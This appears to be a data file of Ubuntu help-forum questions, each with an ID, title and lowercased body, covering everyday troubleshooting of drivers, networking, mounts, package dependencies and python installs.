405412	brother dcp-j140w does not scan ( brscan4 , usb connected )	my brother dcp-j140w does print fine ( took a week , but nevertheless ) . installing the scanner drivers needed a lot ( spread over 6 month ) of trial and error , but worked in the end . i even upgraded from 12.10 to 13.10 to avoid obsolete version-problems . after invoking either sane ( or xsane ) the scanner seems to be recognized . ( in any case , if the device is switched off , sane reports `` no scanner found '' , when switched on , this message does not appear . ) when clicking the `` scan '' -button , 7 circles start turning , but after a second or two , sane reports `` scan failed . can not start the scan . '' ( messages in dutch , translated here for your convenience . ) the `` change scanner '' button shows that indeed the right make and type seem to be found . tried to find an answer in the similar questions , but answers that seem to apply do not make any difference when i try to follow the advise . is this a configuring problem , or permissions ? i hope some of you out there can help , for which i thank you in advance .
405414	how can i browse my hard disk drive ?	i am new to this operating system , and i ca n't really get around how to browse my hard disk drive . i have a hdd with 3 partitions and i would like to browse for my files but i can only use the desktop and thats about all . i am not experienced with ubuntu , but i am sick and tired of microdumbs windass . i 've read about the command line and how it works but it bugs me that i ca n't really find my partitions . is there an explorer-like application that i can use so i can safely browse the content of my hard disk drive ? thank you very much .
405418	how can i install a security updates before a given date ?	how can i install just security updates from the command line ? the above question does a good job of describing how to do security updates only . is there a way to install all security updates that were released before certain date ? the context here is a chef recipe . i 'd like to install all updates as of today on qa systems . then when i release this to production it should just install security updates up to that date . i could maintain a list , but as you can imagine it could be hard and some systems might be in various states .
405420	sudo instead of root sometimes asks for password	ubuntu 13.7 i 'm not set up as root and do n't want to be . but sometimes /not always/ but sometimes when i try to run a sudo command , i 'm asked for my password . i type in my user password , since i do n't think i have a root pw , not being root , right ? ) and the password is n't accepted . why does this happen ? for instance , i tried a sudo command and got this terminal response : '' user password accepted on login but rejected on terminal ''
405427	my computer does n't connect to the network on boot	for some reason my computer running ubuntu 12.04 has stopped connecting to the wired network on boot . when i run ifconfig i get : eth0 link encap : ethernet hwaddr 00:21:5a:2e:1a : e2 inet addr:192.168.105.105 bcast:192.168.105.255 mask:255.255.255.0 inet6 addr : fe80 : :221:5aff : fe2e:1ae2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:95 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 rx bytes:60 ( 60.0 b ) tx bytes:14432 ( 14.4 kb ) memory : f0180000-f01a0000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1235 errors:0 dropped:0 overruns:0 frame:0 tx packets:1235 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:115789 ( 115.7 kb ) tx bytes:115789 ( 115.7 kb ) it 's only after i run sudo dhclient -v eth0 that it 's able to connect ( ip is in the range 10.0.0.* ) . any ideas on why this is happening ? if it 's any help here are the contents of /etc/network/interfaces : auto lo iface lo inet loopback
405429	battery management in ubuntu	how can i change the battery management settings in my laptop ? i used to have a windows installed and in that , the battery management program ( for the sake of battery health ) had the charging limited to 60 % . now i 'm on ubuntu and what should i do to change it ?
405439	mysterious directories appearing in home folder & system slowing	i 've been using ubuntu for nearly 2 years ( since 12.04 ) , and updated from 12.04 to 12.10 , to 13.10 , always as a dual-boot option using the wubi installer . never had any serious issues or problems . about 2 weeks ago , i wiped the hd and installed a standalone version of 13.10 , all was well for the first week ... but now i have mysterious directories appearing in the home directory , and sometimes the hd appears to go into flurries of constant activity indicated by its activity light , and whilst it is reading/writing constantly it does n't sound as busy to the ear as a hd being worked to the bone . i removed the first directory to appear from home to the trash bin , and immediately ran into problems where i could n't access the trash bin , could n't empty , and could n't restore . the entire system also slowed to an unusable snail 's pace . nautilus is unable to access the trash bin , and pops up a 'preparing ' dialog box which just hangs/does n't respond . bleachbit also hangs/stops responding when run as a regular user , but will run properly when run as root . i used terminal to list the contents of the trash bin , and moved it to the desktop using the mv command in terminal , i then dropped it back into the home directory where it originally appeared . normal service resumed , and problems disappeared . except now another mysterious directory has appeared , also in the home directory , and again i have a constantly active hd and a system which is slowing down once again . the only change in the last week ( when this problem started ) has been the installation of xbmc , but i 'm not certain that the problem ( s ) are linked to this installation . i 've tried a search , but not found any other q 's which strictly seem to describe this problem , unfortunately . hopefully somebody can help , before i end up with a system which is unusable . : ( here 's an image showing the two directories which have appeared so far , and seem linked to the system slowing down . here 's the contents/results of trying to access these folders . i 've discovered it 's nautilus is causing the hd activity and system slowdown , but only when left open with the home folder displayed , click to any other folder except the 2 unidentified ones and it stops accessing the hd and taking up processor time , screenshot below .
405441	problem with upstart sessions : unable to granpt : exec format error	i have a very specific problem . i have installed an arm ubuntu 13.10 on chromebook with original chromebooks linux kernel . and i got the strange errors in ~/.xsession-errors which prevents me to start the kde desktop : init : failed to spawn logrotate pre-start process : unable to granpt : exec format error ... granpt ? what does it mean ? i discovered that the string `` unable to granpt '' is defined in init binary . also i have found that those errors caused by /etc/x11/xsession.d/00upstart , so when i remove it , the kde starts normally , but lacks some features like virtual terminal , etc . all ubuntu scripts are orginal and not modified . looks like it is problem with some security restrictions in chromebook kernel , but i ca n't understand how those sessions runs and how i can debug it ? does anyone are close familiar with upstart to help me ?
405442	how can i disable cloud-init ?	i have fully-configured instance and create image from them for autoscaling group . when autoscaling setup new instance from this image , it calls cloud-init . and cloud-init changes hostname and breakes fstab . i want to prevent cloud-init from start on instance launch .
405455	how to remove ntfs partition in ubuntu launcher ?	i am new to ubuntu , and just installed ubuntu12.04 along with a dual boot for windows 7 . and i was following some tutorial on booting up ubuntu with the ntfs partition of windows 7 mounted , i did that because i need some files from that partition although i can access it on nautilus after mounting it . the problem is after following some tutorial , i want it to behave like before , so i tried messing with /etc/fstab file . my problem now is i ca n't remove the partition icons on the launchpad screenshot and when i go to nautilus i ca n't unmount them , because it says unabe to unmount [ parition name ] error unmounting : umount exited with exit code 1 : helper failed with : umount : only root can unmount /dev/sda1 from /media/sda1
405456	no cron job for root	i am trying to make source distribution ( python package ) which has setup.py file that deploys cron job using subprocess call . but error is coming : no cronjob for root here is setup.py file : $ sudo python setup install from distutils.core import setup from distutils.command.install import install as _install from subprocess import call def _post_install ( dir ) : call ( `` cp utils/start.sh /usr/bin/start.sh '' , shell = true ) call ( `` bash start.sh '' , shell = true ) //setting cron job class install ( _install ) : def run ( self ) : _install.run ( self ) self.execute ( _post_install , ( self.install_lib , ) , msg= '' \n************enter details**************\nrunning post install task '' ) setup ( cmdclass= { 'install ' : install } , name='logparser-utility ' , version='1.0 ' , description='utility that once installed on a linux box , automatically reads nginx logs at x interval ( configurable ) and sends an email with 4xx and 5xx error count and uris ' , author='anil arya ' , author_email='anil @ hashedin.com ' , license = `` gpl '' , url='https : //github.com/abc/logutility ' , packages= [ 'utils' ] , ) any suggestion to run start.sh file .
405458	tweetdeck webapp for firefox	twitter bought tweetdeck . using firefox or chromium , after entering the website http : //web.tweetdeck.com/ displays a notification to install unity interface integration . unfortunately this does not work , and really care about notifications , because i got used to those in chrome , and since chrome is trying to cut off . can you help me ?
405467	`` sudoing '' strategy for python script on ubuntu	i 'm creating a small router program ( gtk frontend ) in python for some of our less cli savvy users . i 've developed the glade front-end and able to connect the various signals . now , i 'm facing only one issue which is to create the 'sudo ' interface . for some reasons , we do n't want the user to start the program using gksu , but instead provide him a password dialog that is later stored in the program ( similar to what happens with synaptic package manager ) . trouble is that the script works fine when i tested on gnome 3 desktop where i developed it , but on ubuntu the gksu command is not saving anything to keyring . instead , it asks password for each command ! here is the function in the program that calls gksu : def execute ( command , errorstring= '' , wait = true , shellexec = true ) : try : print 'command= ' + command p=subprocess.popen ( `` gksu ' '' + command + `` ' '' , shell=shellexec , stdout=subprocess.pipe , stderr=subprocess.pipe ) if wait : p.wait ( ) result=get_stdout ( p ) return result else : print 'not waiting' return p except subprocess.calledprocesserror as e : print 'error occured : ' + errorstring return errorstring and here is an example of how i call the execute function in some parts of my program : # stop hostapd if already running . if is_process_running ( 'hostapd ' ) > 0 : writelog ( 'stopping hostapd ' ) **execute ( 'killall hostapd ' ) ** # enable forwarding in sysctl . writelog ( 'enabling forward in sysctl . ' ) set_sysctl ( 'net.ipv4.ip_forward ' , '1 ' ) how do i go about it so that the gksu call stores password in the keyring or something and does n't bother user each time ?
405468	mail server set up	i 've followed all steps from this article http : //notblog.org/install-mail-server/ , but i do n't know what to do next . was this article enough for mail server configuration ? how can i create an email account like myname @ mydomain.com and access it through roundcube , outlook or other email client . i 've found lots of articles on internet but none of them was a complete one .
405469	can not find wireless access points	i just installed ubuntu i dont know how to search for available networks via my wifi modem i think my wireless modem is correctly installed and ubuntu detects it , and when i use lspci i will get sth like this : 00:0a.0 network controller [ 0280 ] : texas instruments acx 111 54mbps wireless interface [ 104c:9066 ] subsystem : d-link system inc dwl-g520+ wireless pci adapter [ 1186:3b04 ] but when i use the connection manager in the wireless tab there nothing to select anything i can do ? thanks alot ; )
405471	how do i resolve a 401 error when setting up juju maas environment ?	here is the debug output : 2014-01-14 17:09:57 debug juju.environs.configstore disk.go:77 making /home/neo/.juju/environments 2014-01-14 17:09:57 info juju.environs open.go:156 environment info already exists ; using new not prepare 2014-01-14 17:09:57 debug juju.provider.maas environprovider.go:33 opening environment `` maas '' . 2014-01-14 17:09:58 error juju supercommand.go:282 could not access file 'aead8cd6-dc25-4b05-8b31-b7696316546b-provider-state ' : gomaasapi : got error back from server : 401 unauthorized error 2014-01-14 11:28:47,651 maasserver # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # exception : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # error 2014-01-14 11:28:47,652 maasserver traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/django/core/handlers/base.py '' , line 115 , in get_response response = callback ( request , *callback_args , **callback_kwargs ) file `` /usr/lib/python2.7/dist-packages/django/views/decorators/vary.py '' , line 19 , in inner_func response = func ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 128 , in __call__ actor , anonymous = self.authenticate ( request , rm ) file `` /usr/lib/python2.7/dist-packages/maasserver/api_support.py '' , line 47 , in authenticate restrictedresource , self ) .authenticate ( request , rm ) file `` /usr/lib/python2.7/dist-packages/piston/resource.py '' , line 103 , in authenticate if not authenticator.is_authenticated ( request ) : file `` /usr/lib/python2.7/dist-packages/maasserver/api_auth.py '' , line 57 , in is_authenticated raise oauthunauthorized ( error ) oauthunauthorized i am trying to connect to my freshly setup maas enviroment . has anyone else seen this error ?
405472	how can i downgrade my juju revision ?	i installed the latest juju development release - and due to some bugs , i would like to revert back to stable , how do i do that ? i 've executed the following against my machine : sudo apt-get remove juju juju-local sudo rm /etc/apt/sources.list.d/juju-devel.list sudo add-apt-repository ppa : juju/stable sudo apt-get update & & sudo apt-get install juju juju-local it still shows the juju development version as installed . what went wrong ?
405474	smart file replacing	many times i have to merge two folders by cutting everything from the folder 1 and pasting to the folder 2 . often , files have the same names , and thunar ask me whether i want to replace or skip the pasting . i 'd like to have a method to replace them automatically and in a smart way . for example , i 'd like to say to my linuxbox that older files must always be replaced , or i 'd like that smaller files are those to be replaced ... is there a way to set a conditional replace/skip operations using file parameters ? i use xubuntu and thunar , but i appreciate any solutions , even if they are for other applications or command-line .
405484	my ubuntu software center wo n't download any programs ! what can i do ?	i 've tried everything i could find on the internet , but still ca n't download anything from the ubuntu software center.it wo n't install anything , it wo n't do any progress when downloading . i have even tried reinstalling ubuntu . when i try to download anything , it says `` updating cache '' . btw . i 'm using 13.04 , and it says i have internet , but the internet wo n't work , i also used the b34 or 43 method . here is the outcome when i typed software-center in the terminal : http : //paste.ubuntu.com/6791762/
405485	accessing image module for python in ubuntu	how do i access the imageops module for python in ubuntu 12.4 . i wanted to use inbuilt image processing functions but m unable to acess those.can someone tell me that how do i aceess that module.there is an import error like imageops module is missing.what should i do ?
405487	transmission says port is closed but seeding is happening	i 'm using transmission right now . the transmission 's test of the port says : port is closed . but there is seeding activity ( around 160kb/s ) . i re-checked the port with an online site . it says closed too . how is that possible ? ? i forgot to add that i use ubuntu 12.04 and i enabled upnp both in transmission and in the router 's interface . could seeding happen even if the port is closed ?
405488	unable to access windows phone on ubuntu 13.10 - via usb	how do i access windows phone in ubuntu 13.10 using usb . it was working beautifully with ubuntu 13.04 . please help me out .
405491	amount of space required for ubuntu	i am about to partition my laptop for ubuntu . i already have backtrack partitioned on my computer . however , i recently heard that linux does not need much space when partitioning because it will use other partitions for more space ? is this true ? thanks for the help !
405492	chromium kiosk almost done	i have a 12.04 system here with a chromium kiosk . i have it auto logging in and auto starting chromium kiosk mode and incognito to the proper web page . only this is that we dont want people to be able to alt+f4 or ctrl+w out of chromium . ive tried disable alt+f4 in the keyboard shortcut keys and it does not work for some reason , however , disable ctrl+alt+del does work ( which is good ) . so those are the last two things i need to figure out to make this chromium kiosk production ready . thanks in advance .
405493	problem with mount using option `` sec=ntlmv2 ''	i have a partition called d : \ shared at a windows machine , and in my ubuntu server 12.4 i have this line at fstab to mount it //10.0.0.39/d $ / /mnt/charles/ cifs user , file_mode=0777 , dir_mode=0777 , rw , gid=1000 , sec=ntlmv2 , credentials=/root/creds 0 0 i 've added the option `` sec=ntlmv2 '' , because was appearing this message every time i boot/reboot my ubuntu . cifs vfs : default security mechanism requested . the default security mechanism will be upgraded from nbtlm to ntlmv2 in kernel realese 3.3 now i ca n't mount with this `` sec=ntlmv2 '' option , because appear to me . mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) can someone help ? thanks in advance ! this is the result with -- verbose , what this can help to find the problem ? root @ pitcairn : /mnt # mount -t cifs //10.0.39/d $ / /mnt/charles -- verbose -ouser=yamash , sec=ntlmv2 password : mount.cifs kernel mount options : ip=10.0.0.39 , unc=\\10.0.39\d $ , sec=ntlmv2 , ver=1 , user=yamash , pass=******** mount error ( 22 ) : invalid argument refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) -- edit -- zetrocker came with the solution , i changed the `` sec=ntlmv2 '' to `` sec=ntlmssp '' and now it 's working . thanks zetrocker
405501	can not load module after updating php to 5.5	after updating php and restarting the apache2 i get this error : can not load /usr/lib/apache2/modules/mod_r.so into server : /usr/lib/apache2/modules /mod_r.so : undefined symbol : ap_log_rerror this module is the rapache . before that update everything was fine on my ubuntu 12.04 . i am very new to ubuntu . can anybody help ?
405502	easy way to download package from a ppa ?	i am wondering whether there is a command line tool that one can use to download a package from a source ( standard ubuntu or ppa sources ) ? i know that packages i just installed are found in /var/cache/apt/archives and i thus can check out the package from there . however , if i installed the package a long time ago , i do n't want to reinstall it , just check a few things in the source package , how can i get easily a hold of it without having to search for it on the internet ?
405505	virtual hotspot router to share wifi	can someone suggest me an app for ubuntu 13.10 to create a hotspot and share my wifi internet connection like connectify for windows you may ask why do n't i connect to the wifi directly rather than creating a new wifi using my laptop , but the problem is , i have a restricted internet connection which needs mac id registration . unfortunately , i can not get my mobile mac id registered and i want to use the same connection . please let me know if you need more information . i am using ubuntu 13.10 on lenovo g460 . thanks , km
405506	does ubuntu work with a hp deskjet f2480	i am thinking of updating my old xp desktop to ubuntu . i was just wondering does ubuntu work with a hp deskjet f2480 all in one printer/scanner ? i would like it to be able , to print & scan . cheers ! carl
405508	how to find name of currently-active network interface ?	i need to get the name of the network interface ( e.g . eth0 , wlan0 ) that is the currently-active one , the one sending and receiving traffic at the moment . when it 's connected to wifi , it would be wlan0 but when it 's connected directly it would be eth0 . or something else , depending on the network devices on the system and which one is active . how can i find this out ?
405511	changes to ubuntu after upgrading to 12.04.03	i have just updated ubuntu 12.04.2 to 12.04.4 and lost the ability to `` see '' my brother hl5350dn printer when i browse for printers on a windowsxp workstation . i am suspicious that it may be a samba problem - perhaps due to different defaults . when i look at my /var/log/samba/log.smbd error log it has : [ 2012/01/14 14:33:17 , 0 ] smbd/server/c/2207 ( main ) standard input is not a socket , assuming -d option [ 2012/01/14 14:33:19.796215 , 0 ] printing/print_cups.c:110 ( cups_connect ) unable to connect to cups server localhost:631 - connection refused [ 2012/01/14 14:33:19.796637 , 0 ] printing/print_cups.c:487 ( cups_async_callback ) failed to retreive printer list : nt_status_unsuccessful when i look at my /var/log/samba/log.man1 log it has : [ 2012/01/14 14:44:09.388634 , 0 ] rpc-server/spoolss/srv_spoolss_nt.c:1748 ( _spools_openprinterex ) _spoolss_openprinterex : can not open a printer handle for printer \\server05 can anyone help with why this should be ? or where i can find out how to fix the problem ?
405512	install ubuntu sdk error	i have this error : w : failed to fetch cdrom : //ubuntu 12.04.3 lts _precise pangolin_ - release amd64 ( 20130820.1 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch bzip2 : /var/lib/apt/lists/partial/jo.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-amd64_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
405515	ca n't mount / . ubuntu 13.10 problem with booting	i have ( only ) ubuntu 13.10 installed on my laptop and i wanted to boot from cd instead of my hdd so used gparted - i 'unclicked ' the option to boot from sdv1 automatically when starting and now i ca n't use ubuntu anymore . i thought it would be easy to boot from hdd again but unfortunatelly it is n't ( for me ) . only thing that seems to work is `` ubuntu , linux 3.11.0-15-generic ( rescue mode ) '' and `` ubuntu , linux 3.11.0-15-generic '' , but when i tried to fix this problem by myself there is an information that the files are read-only . i would even accept having to format the whole hdd if it 's the fastest/easiest possible solution . i apologise for not giving the exact output data , but i 'm using not-english version of ubuntu so i have to translate to english by myself . + i guess that to solve this problem i only need to change the booting option - set it as it was before i changed it - to boot from sdv1 , but i do n't know how to do it .
405519	problem with /mnt/	i 'm using ubuntu 12.4 , and after some time of inactivity , i ca n't `` ls '' `` cp '' `` mv '' o any other command into my /mnt/ folder , i have to reboot to can do anything in this folder . my /etc/fstab below # /etc/fstab : static file system information . # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 /dev/mapper/pitcairn-root / ext4 errors=remount-ro 0 1 # /boot was on /dev/sda1 during installation uuid=21089a7e-981e-4b20-b682-596f5099f539 /boot ext2 defaults 0 2 /dev/mapper/pitcairn-swap_1 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # shared folder //10.0.0.39/d $ / /mnt/charles/ cifs user , file_mode=0777 , dir_mode=0777 , rw , gid=1000 , sec=ntlmv2 , credentials=/root/creds 0 0 # samsung hd502hi uuid=e238b30638b2d92d /mnt/sdb1/ ntfs rw 0 0 # cd-rom # /dev/sr0 /mnt/sr0 udf , iso9660 user , noauto 0 0 i 'm googling and googling and testing around to catch the problem , i 've checked that appear to be the windows firewall , it already have the rules to allow samba and another relative applications but when active the firewall it block the connection of samba and when i disable it samba return to live . i still looking for solution , at this time , that 's all thanks for your help .
405528	need username and password	i downloaded kubuntu 12.04.3 lts and used unetbootin to install onto a flashdrive . when run the installation asks for a username and password . what are they ?
405530	`` e : sub-process /usr/bin/dpkg returned an error code ( 1 ) '' ''	when i run the software central to remove some package ( desktop-unity ) as mentioned in a similar post which helped the author there - i run into repair module of the software central which gives an error 'package configuration failed ' with details like below and keeps running in a loop . installarchives ( ) failed : dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) ; however : version of libqt4-declarative on system is 4:4.8.1-0ubuntu4.5 . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-declarative ( -- configure ) : libqt4-declarative : amd64 4:4.8.1-0ubuntu4.5 can not be configured because libqt4-declarative : i386 is in a different version ( 4:4.8.1-0ubuntu4.6 ) dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-svg ( -- configure ) : no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-declarative : i386 ( -- configure ) : libqt4-declarative : i386 4:4.8.1-0ubuntu4.6 can not be configured because libqt4-declarative : amd64 is in a different version ( 4:4.8.1-0ubuntu4.5 ) dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) ; however : package libqt4-declarative : i386 is not configured yet . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuratno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already ion of libunity-2d-private0 : libunity-2d-private0 depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . libunity-2d-private0 depends on libqt4-opengl ( > = 4:4.5.3 ) ; however : package libqt4-opengl is not configured yet . libunity-2d-private0 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libunity-2d-private0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-panel : unity-2d-panel depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 is not configured yet . unity-2d-panel depends on libunity-2d-private0 ( = 5.14.0-0ubuntu2 ) ; however : package libunity-2d-private0 is not configured yet . dpkg : error processing unity-2d-panel ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-spread : unity-2d-spread depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . unity-2d-spread depends on libqtgui4 ( > = 4:4.5.3 ) ; however : package libqtgui4 is not configured yet . unity-2d-spread depends on libunity-2d-private0 ( = 5.14.0-0ubuntu2 ) ; however : package libunity-2d-private0 is not configured yet . unity-2d-spread depends on libqt4-svg ; however : package libqt4-svg is not configured yet . dpkg : error processing unity-2d-spread ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-shell : unity-2d-shell depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . unity-2d-shell depends on libqtgui4 ( > = 4:4.6.1 ) ; however : package libqtgui4 is not configured yet . unity-2d-shell depends on libunity-2d-private0 ( = 5.14.0-0ubuntu2 ) ; however : package libunity-2d-private0 is not configured yet . unity-2d-shell depends on libqt4-svg ; however : package libqt4-svg is not configured yet . dpkg : error processing unity-2d-shell ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d : unity-2d depends on unity-2d-panel ; however : package unity-2d-panel is not configured yet . unity-2d depends on unity-2d-spread ; however : package unity-2d-spread is not configured yet . unity-2d depends on unity-2d-shell ; however : package unity-2d-shell is not configured yet . dpkg : error processing unity-2d ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libqtgui4 libqt4-declarative libqt4-svg libqt4-opengl libqt4-declarative : i386 libqtgui4 : i386 libunity-2d-private0 unity-2d-panel unity-2d-spread unity-2d-shell unity-2d error in function : systemerror : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) dpkg : dependency problems prevent configuration of libqtgui4 : libqtgui4 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) ; however : version of libqt4-declarative on system is 4:4.8.1-0ubuntu4.5 . dpkg : error processing libqtgui4 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libqt4-declarative ( -- configure ) : libqt4-declarative : amd64 4:4.8.1-0ubuntu4.5 can not be configured because libqt4-declarative : i386 is in a different version ( 4:4.8.1-0ubuntu4.6 ) dpkg : error processing libqt4-declarative : i386 ( -- configure ) : libqt4-declarative : i386 4:4.8.1-0ubuntu4.6 can not be configured because libqt4-declarative : amd64 is in a different version ( 4:4.8.1-0ubuntu4.5 ) dpkg : dependency problems prevent configuration of libqt4-svg : libqt4-svg depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-svg depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-svg ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-panel : unity-2d-panel depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing unity-2d-panel ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqt4-opengl : libqt4-opengl depends on libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtcore4 on system is 4:4.8.1-0ubuntu4.6 . libqt4-opengl depends on libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) ; however : version of libqtgui4 on system is 4:4.8.1-0ubuntu4.6 . dpkg : error processing libqt4-opengl ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-spread : unity-2d-spread depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . unity-2d-spread depends on libqtgui4 ( > = 4:4.5.3 ) ; however : package libqtgui4 is not configured yet . unity-2d-spread depends on libqt4-svg ; however : package libqt4-svg is not configured yet . dpkg : error processing unity-2d-spread ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libunity-2d-private0 : libunity-2d-private0 depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . libunity-2d-private0 depends on libqt4-opengl ( > = 4:4.5.3 ) ; however : package libqt4-opengl is not configured yet . libunity-2d-private0 depends on libqtgui4 ( > = 4:4.8.0 ) ; however : package libqtgui4 is not configured yet . dpkg : error processing libunity-2d-private0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d-shell : unity-2d-shell depends on libqt4-declarative ( > = 4:4.7.0~rc1 ) ; however : package libqt4-declarative is not configured yet . unity-2d-shell depends on libqtgui4 ( > = 4:4.6.1 ) ; however : package libqtgui4 is not configured yet . unity-2d-shell depends on libunity-2d-private0 ( = 5.14.0-0ubuntu2 ) ; however : package libunity-2d-private0 is not configured yet . unity-2d-shell depends on libqt4-svg ; however : package libqt4-svg is not configured yet . dpkg : error processing unity-2d-shell ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libqtgui4 : i386 : libqtgui4 : i386 depends on libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) ; however : package libqt4-declarative : i386 is not configured yet . dpkg : error processing libqtgui4 : i386 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-2d : unity-2d depends on unity-2d-panel ; however : package unity-2d-panel is not configured yet . unity-2d depends on unity-2d-spread ; however : package unity-2d-spread is not configured yet . unity-2d depends on unity-2d-shell ; however : package unity-2d-shell is not configured yet . dpkg : error processing unity-2d ( -- configure ) : dependency problems - leaving unconfigured in the terminal : e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ : /home/pm # apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libqt4-declarative : depends : libqt4-network ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-script ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-sql ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqt4-xmlpatterns ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed breaks : libqt4-declarative : i386 ( ! = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-declarative : i386 : breaks : libqt4-declarative ( ! = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.5 is installed libqt4-opengl : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqt4-svg : depends : libqtcore4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed depends : libqtgui4 ( = 4:4.8.1-0ubuntu4.5 ) but 4:4.8.1-0ubuntu4.6 is installed libqtgui4 : depends : libqt4-declarative ( = 4:4.8.1-0ubuntu4.6 ) but 4:4.8.1-0ubuntu4.5 is installed e : unmet dependencies . try using -f. root @ : /home/pm # apt-get -f install yields similar errors . hi @ braiam , here is the output of the apt-get check : ~ 